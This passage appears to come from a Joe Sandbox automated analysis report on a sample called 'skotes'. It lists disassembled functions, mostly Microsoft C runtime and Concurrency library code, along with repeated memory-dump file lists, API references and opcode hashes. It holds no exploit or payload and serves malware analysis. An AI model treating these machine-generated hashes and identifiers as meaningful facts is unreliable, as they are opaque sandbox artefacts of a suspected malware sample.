                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3403738998-0
                                                                                                                                                                                                                                          • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                          • Instruction ID: 1fc016a2819bd8f688a58af72c3331336eaa7cee2b591e75d140c19f9c3e1d64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9512CB1A00219ABDF08DF64C595BEDB3B9BF08304F154069E915AB382DB74EE85CB90
                                                                                                                                                                                                                                          Function 006C52A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 006C53A0
                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006C53C7
                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 006C54D3
                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 006C55AE
                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 006C5650
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 4162181273-393685449
                                                                                                                                                                                                                                          • Opcode ID: 93f05e7ad1d219d688c66ea9ff4ae7339e0592e4dd16ec30e9dc2cba2f5a1fc7
                                                                                                                                                                                                                                          • Instruction ID: 81b44c00f7da6fb46b831a38c905d36a78026d2a5f1e4fcf8c16f5c45c897d6a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93f05e7ad1d219d688c66ea9ff4ae7339e0592e4dd16ec30e9dc2cba2f5a1fc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC17771800649DFCF29DFA4CC84EBEBBB6EF14311B44415EE8166B212D770EA91CB95
                                                                                                                                                                                                                                          Function 006C4840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006C4877
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006C487F
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006C4908
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 006C4933
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006C4988
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: S9l$csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-48277793
                                                                                                                                                                                                                                          • Opcode ID: f20953805513f9933cef10b092e515312783a65108cb2cff81017858e03fb94e
                                                                                                                                                                                                                                          • Instruction ID: d4c1c59136570ede79330c7ef6e97122ed7899bab770da3b10f5bce168fcb7fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f20953805513f9933cef10b092e515312783a65108cb2cff81017858e03fb94e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741E334A002599BCF10DF28C894FAEBBB6EF05314F14815DE8155B392CB31EA41CF91
                                                                                                                                                                                                                                          Function 006B7364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006B73B0
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006B73F2
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 006B740E
                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 006B7419
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B7440
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                          • API String ID: 3897347962-3650809737
                                                                                                                                                                                                                                          • Opcode ID: 2bc1a61b7632280387511c5f918c380c964b0820f5c9bbbb72d78d40d97ec76e
                                                                                                                                                                                                                                          • Instruction ID: fe2213f6bff22aeb4f9f449f7144819b447fdc1c3e3b743c31a1591783ebc274
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bc1a61b7632280387511c5f918c380c964b0820f5c9bbbb72d78d40d97ec76e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA2171B4A00319AFCB10EF65C5859EDBBB6BF49310F1540A9E901AB351DB30AE81DF94
                                                                                                                                                                                                                                          Function 006AEE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 006AEEBC
                                                                                                                                                                                                                                          • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 006AEEC8
                                                                                                                                                                                                                                          • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 006AEEE1
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 006AEF0F
                                                                                                                                                                                                                                          • Concurrency::Context::Block.LIBCONCRT ref: 006AEF31
